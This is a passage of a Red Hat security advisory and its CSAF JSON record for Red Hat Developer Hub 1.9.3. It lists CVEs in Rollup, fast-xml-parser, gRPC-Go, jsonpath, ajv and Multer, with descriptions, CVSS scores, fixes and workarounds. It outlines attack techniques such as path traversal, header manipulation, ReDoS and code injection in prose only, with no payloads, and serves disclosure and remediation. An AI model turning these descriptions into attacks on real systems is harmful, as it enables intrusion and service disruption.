A flaw was found in Rollup, a JavaScript module bundler. Insecure file name sanitization in the core engine allows an attacker to control output filenames, potentially through command-line interface (CLI) inputs, manual chunk aliases, or malicious plugins. By using directory traversal sequences (`../`), an attacker can overwrite files anywhere on the host filesystem where the build process has write permissions. This vulnerability can lead to persistent remote code execution (RCE) by overwriting critical system or user configuration files.
9.1 (Critical)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6802
A flaw was found in fast-xml-parser. A user can exploit this flaw by processing specially crafted XML data with the XML builder when the `preserveOrder` option is enabled. This can lead to a stack overflow, causing the application to crash and resulting in a Denial of Service (DoS).
7.5 (High)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6802
Workaround
To mitigate this vulnerability, configure applications using the `fast-xml-parser` XML builder to set the `preserveOrder` option to `false`. Alternatively, ensure that all XML input data is thoroughly validated before being passed to the builder to prevent the processing of malicious or malformed content.
A flaw was found in gRPC-Go, the Go language implementation of gRPC. This vulnerability, an authorization bypass, is caused by improper input validation of the HTTP/2 `:path` pseudo-header. A remote attacker can exploit this by sending raw HTTP/2 frames with a malformed `:path` that omits the mandatory leading slash. This allows the attacker to bypass defined security policies, potentially leading to unauthorized access to services or information disclosure.
8.1 (High)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6802
Workaround
To mitigate this issue, implement infrastructure-level normalization to ensure all incoming HTTP/2 `:path` headers are properly formatted with a leading slash before reaching the gRPC-Go server. This can be achieved by configuring a reverse proxy or API gateway to validate and normalize the `:path` header. Ensure that any such intermediary is properly configured and restarted to apply the changes, which may temporarily impact service availability.
References
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat Developer Hub 1.9.3 has been released.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Developer Hub (RHDH) is Red Hat\u0027s enterprise-grade, self-managed, customizable developer portal based on Backstage.io. RHDH is supported on OpenShift and other major Kubernetes clusters (AKS, EKS, GKE). The core features of RHDH include a single pane of glass, a centralized software catalog, self-service via golden path templates, and Tech Docs. RHDH is extensible by plugins.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:6802",
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61140",
"url": "https://access.redhat.com/security/cve/CVE-2025-61140"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-69873",
"url": "https://access.redhat.com/security/cve/CVE-2025-69873"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-1615",
"url": "https://access.redhat.com/security/cve/CVE-2026-1615"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-2359",
"url": "https://access.redhat.com/security/cve/CVE-2026-2359"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-24046",
"url": "https://access.redhat.com/security/cve/CVE-2026-24046"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25153",
"url": "https://access.redhat.com/security/cve/CVE-2026-25153"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25679",
"url": "https://access.redhat.com/security/cve/CVE-2026-25679"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25896",
"url": "https://access.redhat.com/security/cve/CVE-2026-25896"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26278",
"url": "https://access.redhat.com/security/cve/CVE-2026-26278"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27606",
"url": "https://access.redhat.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27942",
"url": "https://access.redhat.com/security/cve/CVE-2026-27942"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-3304",
"url": "https://access.redhat.com/security/cve/CVE-2026-3304"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-33186",
"url": "https://access.redhat.com/security/cve/CVE-2026-33186"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-3520",
"url": "https://access.redhat.com/security/cve/CVE-2026-3520"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://catalog.redhat.com/search?gs\u0026searchType=containers\u0026q=rhdh",
"url": "https://catalog.redhat.com/search?gs\u0026searchType=containers\u0026q=rhdh"
},
{
"category": "external",
"summary": "https://developers.redhat.com/rhdh/overview",
"url": "https://developers.redhat.com/rhdh/overview"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_developer_hub",
"url": "https://docs.redhat.com/en/documentation/red_hat_developer_hub"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHDHBUGS-2736",
"url": "https://issues.redhat.com/browse/RHDHBUGS-2736"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6802.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Developer Hub 1.9.3 release.",
"tracking": {
"current_release_date": "2026-04-10T15:10:09+00:00",
"generator": {
"date": "2026-04-10T15:10:09+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:6802",
"initial_release_date": "2026-04-07T13:22:11+00:00",
"revision_history": [
{
"date": "2026-04-07T13:22:11+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-07T13:22:17+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-10T15:10:09+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Developer Hub 1.9",
"product": {
"name": "Red Hat Developer Hub 1.9",
"product_id": "Red Hat Developer Hub 1.9",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhdh:1.9::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Developer Hub"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"product": {
"name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"product_id": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhdh-hub-rhel9@sha256%3A5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d?arch=amd64\u0026repository_url=registry.redhat.io/rhdh\u0026tag=1775140647"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64",
"product": {
"name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64",
"product_id": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhdh-rhel9-operator@sha256%3A4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef?arch=amd64\u0026repository_url=registry.redhat.io/rhdh\u0026tag=1775140369"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"product": {
"name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"product_id": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhdh-operator-bundle@sha256%3A6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa?arch=amd64\u0026repository_url=registry.redhat.io/rhdh\u0026tag=1775155242"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64 as a component of Red Hat Developer Hub 1.9",
"product_id": "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
},
"product_reference": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"relates_to_product_reference": "Red Hat Developer Hub 1.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64 as a component of Red Hat Developer Hub 1.9",
"product_id": "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64"
},
"product_reference": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"relates_to_product_reference": "Red Hat Developer Hub 1.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64 as a component of Red Hat Developer Hub 1.9",
"product_id": "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
},
"product_reference": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64",
"relates_to_product_reference": "Red Hat Developer Hub 1.9"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-61140",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2026-01-28T17:00:46.678419+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2433946"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in jsonpath. The `value` function is vulnerable to Prototype Pollution, a type of vulnerability that allows an attacker to inject or modify properties of an object\u0027s prototype. This can lead to various impacts, including arbitrary code execution, privilege escalation, or denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jsonpath: jsonpath: Prototype Pollution vulnerability in the value function",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61140"
},
{
"category": "external",
"summary": "RHBZ#2433946",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433946"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61140",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61140"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61140",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61140"
},
{
"category": "external",
"summary": "https://gist.github.com/Dremig/8105c189774217222a8ebea3ed4d341d",
"url": "https://gist.github.com/Dremig/8105c189774217222a8ebea3ed4d341d"
},
{
"category": "external",
"summary": "https://github.com/dchester/jsonpath",
"url": "https://github.com/dchester/jsonpath"
}
],
"release_date": "2026-01-28T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "jsonpath: jsonpath: Prototype Pollution vulnerability in the value function"
},
{
"cve": "CVE-2025-69873",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-11T19:01:32.953264+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439070"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "ajv: ReDoS via $data reference",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, the $data option must be enabled and the attacker needs to be able to send a payload with a specially crafted regular expression to the application processing the input. A 31-character payload causes approximately 44 seconds of execution, with each additional character doubling the execution time. Therefore, even a small payload can cause an application to become unresponsive and eventually result in a denial of service. Due to this reason, this flaw has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-69873"
},
{
"category": "external",
"summary": "RHBZ#2439070",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439070"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-69873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69873"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"
},
{
"category": "external",
"summary": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md",
"url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md"
}
],
"release_date": "2026-02-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "workaround",
"details": "To mitigate this issue, disable the $data feature if your application does not require it. If $data must be used, implement strict validation of the input fields that are referenced by the pattern keyword to ensure they contain only expected and safe characters.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "ajv: ReDoS via $data reference"
},
{
"cve": "CVE-2026-1615",
"cwe": {
"id": "CWE-94",
"name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
},
"discovery_date": "2026-02-09T11:10:57.572082+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437875"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the jsonpath component. This vulnerability allows a remote attacker to achieve arbitrary code execution by supplying a malicious JSON Path expression. The component\u0027s reliance on the `static-eval` module for processing user-supplied input leads to unsafe evaluation. Successful exploitation can result in Remote Code Execution (RCE) in Node.js environments or Cross-site Scripting (XSS) in browser contexts.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jsonpath: jsonpath: Arbitrary Code Execution via unsafe JSON Path expression evaluation",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Product Security team has rated this vulnerability as Important as it may allows arbitrary code execution when processing untrusted JSON Path expressions. This can lead to Remote Code Execution in Node.js environments or Cross-site Scripting in browser contexts. In some contexts it may be possible to remotely exploit this flaw without any privileges. However, within Red Hat products the jsonpath component is used as a transitive dependency or does not directly handle user input. This context reduces exposure and criticality of this vulnerability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-1615"
},
{
"category": "external",
"summary": "RHBZ#2437875",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437875"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-1615",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1615"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-1615",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1615"
},
{
"category": "external",
"summary": "https://github.com/dchester/jsonpath/blob/c1dd8ec74034fb0375233abb5fdbec51ac317b4b/lib/handlers.js%23L243",
"url": "https://github.com/dchester/jsonpath/blob/c1dd8ec74034fb0375233abb5fdbec51ac317b4b/lib/handlers.js%23L243"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-15141219",
"url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-15141219"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JS-JSONPATH-13645034",
"url": "https://security.snyk.io/vuln/SNYK-JS-JSONPATH-13645034"
}
],
"release_date": "2026-02-09T05:00:09.050000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "jsonpath: jsonpath: Arbitrary Code Execution via unsafe JSON Path expression evaluation"
},
{
"cve": "CVE-2026-2359",
"cwe": {
"id": "CWE-772",
"name": "Missing Release of Resource after Effective Lifetime"
},
"discovery_date": "2026-02-27T16:01:27.340094+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2443350"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Multer, a Node.js middleware for handling `multipart/form-data`. A remote attacker can exploit this vulnerability by intentionally dropping a connection during a file upload. This can lead to a Denial of Service (DoS) due to resource exhaustion on the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "multer: Multer: Denial of Service via dropped file upload connections",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
